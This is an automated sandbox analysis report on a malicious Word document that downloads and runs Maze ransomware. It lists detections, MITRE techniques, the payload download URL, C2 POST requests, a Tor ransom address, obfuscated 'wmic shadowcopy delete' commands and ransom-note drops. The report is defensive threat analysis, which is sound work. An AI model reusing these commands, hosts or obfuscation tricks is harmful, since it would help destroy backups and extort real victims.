
Analysis Report Verdi.doc

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 992382
Start date: 06.11.2019
Start time: 14:01:16
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 9m 6s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Verdi.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.spre.phis.spyw.expl.evad.winDOC@9/176@0/9
EGA Information:
  • Successful, ratio: 50%
HDC Information:
  • Successful, ratio: 17.8% (good quality ratio 17.1%)
  • Quality average: 95.2%
  • Quality standard deviation: 19.8%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe, WMIADAP.exe, conhost.exe, mscorsvw.exe, VSSVC.exe, svchost.exe
  • Execution Graph export aborted for target WINWORD.EXE, PID 3180 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | false | Maze | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

  • Sample does not show any behavior and checks for the installed Java version. It likely requires a different JRE version.
  • Sample monitors window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook.
  • Some HTTP requests failed (404). It is likely the sample will exhibit less behavior.



MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Windows Management Instrumentation1 | Startup Items2 | Startup Items2 | Software Packing21 | Credential Dumping1 | Security Software Discovery31 | Remote File Copy14 | Man in the Browser1 | Data Encrypted11 | Remote File Copy14
Replication Through Removable Media | Scripting11 | Registry Run Keys / Startup Folder2 | Process Injection1 | Scripting11 | Network Sniffing | File and Directory Discovery11 | Taint Shared Content1 | Data from Local System11 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol2
Drive-by Compromise | Exploitation for Client Execution32 | Hidden Files and Directories1 | Path Interception | File Deletion1 | Input Capture | System Information Discovery22 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol3
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information1 | Credentials in Files | Query Registry1 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol23
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading21 | Account Manipulation | Process Discovery2 | Shared Webroot | Data Staged | Scheduled Transfer | Connection Proxy1
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | Hidden Files and Directories1 | Brute Force | Application Window Discovery1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Scripting | Path Interception | Scheduled Task | Process Injection1 | Two-Factor Authentication Interception | Remote System Discovery1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port

Signature Overview



AV Detection:

Antivirus detection for URL or domain
  • Source: http://104.168.198.208/wordupd.tmp | Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for dropped file
  • Source: C:\Windows\Temp\wupd12.14.tmp | Avira: detection malicious, Label: TR/AD.MazeRansom.gvzeo
  • Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp | Avira: detection malicious, Label: TR/AD.MazeRansom.gvzeo
  • Source: C:\Windows\Temp\wupd12.14.tmp | Joe Sandbox ML: detected
  • Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for sample
  • Source: Verdi.doc | Avira: detection malicious, Label: VBA/Dldr.Agent.xgnwi
  • Source: Verdi.doc | Joe Sandbox ML: detected
Multi AV Scanner detection for submitted file
  • Source: Verdi.doc | Virustotal: Detection: 50%
Antivirus or Machine Learning detection for unpacked file
  • Source: 5.2.wupd12.14.tmp.560000.6.unpack | Avira: Label: TR/Patched.Ren.Gen
  • Source: 5.2.wupd12.14.tmp.4c0000.5.unpack | Avira: Label: TR/Patched.Ren.Gen
  • Source: 5.0.wupd12.14.tmp.400000.0.unpack | Avira: Label: TR/AD.MazeRansom.gvzeo

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  • Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_0042300D EqualDomainSid,AnimateWindow,HeapAlloc,TlsGetValue,GetLastError,LookupAccountSidW,CryptGenRandom,LsaQueryTrustedDomainInfo,AnimateWindow,5_2_0042300D
  • Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004028C4 EncryptionDisable,5_2_004028C4
  • Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_00403ECB EncryptionDisable,5_2_00403ECB
  • Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004268A0 EncryptionDisable,5_2_004268A0
  • Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 EntryPoint,EqualDomainSid,AnimateWindow,HeapAlloc,TlsGetValue,GetLastError,LookupAccountSidW,CryptGenRandom,LsaQueryTrustedDomainInfo,AnimateWindow,EnumChildWindows,EnumChildWindows,LsaFreeMemory,HeapAlloc,EqualDomainSid,LsaFreeMemory,EqualDomainSid,DestroyWindow,LsaClose,DeferWindowPos,SelectPalette,5_2_004219E0

Spreading:

Infects executable files (exe, dll, sys, html)
  • Source: C:\Windows\Temp\wupd12.14.tmp | System file mapped for write: C:\Users\user\AppData\Roaming\.jre\Welcome.html
  • Source: C:\Windows\Temp\wupd12.14.tmp | System file written: C:\Users\user\AppData\Roaming\.jre\Welcome.html

Software Vulnerabilities:

Document exploit detected (drops PE files)
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: wordupd[1].tmp.0.dr
Document exploit detected (UrlDownloadToFile)
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\Temp\wupd12.14.tmp
Potential document exploit detected (performs HTTP gets)
  • Source: global traffic | TCP traffic: 192.168.1.16:49163 -> 104.168.198.208:80
Potential document exploit detected (unknown TCP traffic)
  • Source: global traffic | TCP traffic: 192.168.1.16:49163 -> 104.168.198.208:80

Networking:

Found Tor onion address
  • Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp | String found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%
  • Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp | String found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
  • Source: notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp | String found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
Downloads executable code via HTTP
  • Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 06 Nov 2019 13:02:48 GMT | Server: Apache/2.4.6 (CentOS) PHP/5.4.16 | Last-Modified: Tue, 29 Oct 2019 17:33:53 GMT | ETag: "b0e00-59610051d4240" | Accept-Ranges: bytes | Content-Length: 724480 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive
Uses a known web browser user agent for HTTP communication
  • Source: global traffic | HTTP traffic detected: GET /wordupd.tmp HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 104.168.198.208 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /signout/login/ct.html HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.4 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /signout/login/ct.html HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.4 | Content-Length: 237 | Cache-Control: no-cache
  • Source: global traffic | HTTP traffic detected: POST /forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.11 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.25 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /post/yocs.jspx?mh=gvs58 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.26 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.32 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.37 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.37 | Content-Length: 237 | Cache-Control: no-cache
  • Source: global traffic | HTTP traffic detected: POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.4 | Content-Type: application/x-www-form-urlencoded | Content-Length: 49 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.4 | Content-Length: 49 | Cache-Control: no-cache
  • Source: global traffic | HTTP traffic detected: POST /view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.11 | Content-Type: application/x-www-form-urlencoded | Content-Length: 49 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /tracker/lpvotht.php?ij=74lh01y&if=3h00sur HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.25 | Content-Type: application/x-www-form-urlencoded | Content-Length: 49 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /weu.html?n=641&uy=33vt2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.26 | Content-Type: application/x-www-form-urlencoded | Content-Length: 49 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /edit/signout/r.html HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.38 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected: POST /edit/signout/r.html HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.38 | Content-Length: 237 | Cache-Control: no-cache
Connects to IPs without corresponding DNS lookups
  • Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.198.208
Downloads files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
  • Source: global traffic | HTTP traffic detected: GET /wordupd.tmp HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 104.168.198.208 | Connection: Keep-Alive
Posts data to webserver
  • Source: unknown | HTTP traffic detected: POST /signout/login/ct.html HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Host: 91.218.114.4 | Content-Type: application/x-www-form-urlencoded | Content-Length: 237 | Connection: Keep-Alive
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
  • Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 06 Nov 2019 13:03:08 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 219 | Connection: keep-alive | Keep-Alive: timeout=60 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /signou
Urls found in memory or binary dataShow sources

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Maze Ransomware
Source: Yara match | File source: 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.587200933.00040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.587056869.023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.362928581.023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wupd12.14.tmp PID: 3780, type: MEMORY
Source: Yara match | File source: Process Memory Space: notepad.exe PID: 1472, type: MEMORY
Source: Yara match | File source: C:\DECRYPT-FILES.txt, type: DROPPED
Changes the wallpaper picture
Source: C:\Windows\Temp\wupd12.14.tmp | SystemParametersInfo: C:\Users\user~1\AppData\Local\Temp\000.bmp
Deletes shadow drive data (may be related to ransomware)
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Source: C:\Windows\Temp\wupd12.14.tmp | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: C:\Windows\Temp\wupd12.14.tmp | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
May encrypt documents and pictures (Ransomware)
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\$recycle.bin\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1001\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1005\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\documents and settings\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\msocache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\perflogs\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\perflogs\admin\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\program files\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\recovery\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\recovery\30698442-3747-11e0-818c-d0aae148ac37\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\media center programs\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\internet explorer\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\cookies\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\network shortcuts\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\printer shortcuts\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\recent\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\sendto\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\appdata\roaming\microsoft\windows\templates\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\desktop\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\documents\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\documents\my music\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\documents\my pictures\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\documents\my videos\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\downloads\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\favorites\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\links\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\default\saved games\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\bin\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\bin\client\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\bin\dtplugin\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\bin\plugin2\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\applet\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\cmm\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\deploy\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\ext\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\fonts\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\i386\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\images\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\images\cursors\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\jfr\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\management\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\security\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\security\policy\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\security\policy\limited\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\.jre\lib\security\policy\unlimited\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\collab\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\forms\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\jscache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\security\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\security\crlcache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\flash player\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\flash player\assetcache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\flash player\assetcache\p4mtyzfy\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\headlights\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\linguistics\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\adobe\logtransport2\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\identities\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\identities\{7e3c98c2-a457-4c7b-90bc-6b7522d9bded}\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\media center programs\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\addins\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\credentials\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\crypto\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\document building blocks\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\document building blocks\1033\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\document building blocks\1033\14\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\internet explorer\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decrypt-files.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decrypt-files.txt
